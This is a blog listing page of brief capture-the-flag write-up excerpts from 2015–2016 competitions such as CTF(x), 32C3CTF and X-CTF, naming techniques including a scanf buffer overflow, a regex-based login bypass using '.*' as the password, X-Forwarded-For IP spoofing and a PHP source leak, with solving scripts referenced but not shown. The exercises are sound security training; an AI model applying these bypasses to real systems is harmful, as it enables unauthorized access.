NUS Greyhats at CDDC 2015 and (Almost) Epic Mass Exploitation

Disclaimer: All opinions shared in this article are solely mine and I do not represent anyone else. Also, please do note the distinction between ‘Gamemaster’ and ‘Hardware and Network Vendor’ when the terms do appear in the text. Edit (240615 15:40): After speaking to other attendees, I realised I wasn’t quite accurate in how I was…

Read More

CTF(x) 2016 – guesslength (Binary)

We are given  the following source code:

  There is an obvious buffer overflow when the scanf reads an unbounded amount of data into the struct. However, we don’t want to overflow too much or we will overwrite the flag that is stored in the struct. Our solution is to write just enough to…

Read More

CTF(x) 2016 – Harambe Hub

The authentication is insecure because the application uses String.match instead of String.equals to compare the provided credentials and stored credentials. This means that we can provide regex to deduce the correct username to authenticate as and use ‘.*’ as the password to get the real name of an admin. Solving script:

  Running the…

Read More

CTF(x) 2016 – North Korea (Web)

Pretty easy challenge. We need to fake our originating IP address to the site using the ‘X-Forwarded-For’ header. Obviously, we should use an IP address within the North Korean range.

  Flag: ctf(jk_we_aint_got_n0_nuk35)

Read More

CTF(x) 2016 – Custom Auth (Crypto)

Full writeup to come when I get the time

  Running the script:

  Flag: ctf(ecb_m0de_too_Ez?)

Read More

CTF(x) 2016 – Dat Boinary (Binary)

We were pretty happy to have solved this first during the competition.   Here’s the solving script:

  Running the script:

  Flag: ctf(0n1y_th3_fr35h35t_m3m3s)   PS: In coming detailed write-up with Binary Ninja (since everyone’s doing it :))

Read More

X-CTF Qualifiers 2016 – The Snek (Web)

Breedom ain’t bree. OK. The world gonna be litterd with the sneks. Praise snek. http://188.166.226.181:8081.   I designed this challenge for the Qualifying CTF for X-CTF 2016, a CTF aimed at inter-varsity competition. This actually went unsolved so here’s the intended solution 🙂 First, let’s visit the website.     Clicking on the link below…

Read More

HackIM 2016 Case Study

Introduction The Dystopian Narwhals played in the HackIM 2016 CTF organised by Nullcon the last weekend and I must say, it was the most controversial ones I’ve ever experienced. In this post, I will briefly describe the competition format, the controversies, and provide an analysis of the overall experience from the point of view of…

Read More

32C3CTF – Kummerkasten (Web 300)

Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site Please note: This challenge does not follow the flag format. When navigating to the website, we are shown a message about the depressed admin and a form to send him messages. Turns out, the website…

Read More

32C3CTF – Gurke (Misc 300)

Non-standard gurke: https://32c3ctf.ccc.ac/uploads/gurke Talk to it via HTTP on http://136.243.194.43/. We are given a vulnerable python script here:

What this script does is: Initialise a variable  flag over a socket. Apply seccomp rules to restrict syscalls. This is particularly important to note because we now do not have the option of connecting to the server to…

Read More

32C3CTF – TinyHosting (Web 250)

A new file hosting service for very small files. could you pwn it? http://136.243.194.53/ In the comments, there is a hint to use ./?src  to obtain the source code to the index.php.

From the returned source, we get some very interesting PHP code:

What the code does is: Create a  $savepath variable that is derived…

Read More